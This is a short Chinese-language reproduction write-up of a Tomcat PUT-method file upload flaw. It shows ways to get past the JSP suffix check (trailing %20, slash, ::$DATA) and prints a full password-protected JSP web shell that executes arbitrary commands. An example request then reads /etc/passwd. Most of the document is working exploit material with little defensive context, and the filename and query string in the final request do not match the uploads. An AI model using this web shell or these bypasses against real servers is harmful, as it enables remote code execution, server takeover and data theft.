漏洞介绍
当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
漏洞本质Tomcat配置了可写(readonly=false),导致我们可以往服务器写文件:
漏洞复现
Tomcat version: 8.5.19
使用options查看可用请求,发现可以利用put方法
Tomcat对文件后缀有一定检测(不能直接写jsp),但我们可根据不同系统对一些文件系统进行解析的的特性来绕过了限制。
例:
PUT /test.jsp%20
PUT /test.jsp/
PUT /test.jsp::$DATA
<%
if("123".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[1024];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
IP:PORT/test2.jsp/pwd=123&cmd=cat /etc/passwd
GOT IT!
******************************************************
小实验小结,具体测试利用方式需根据具体实践场景~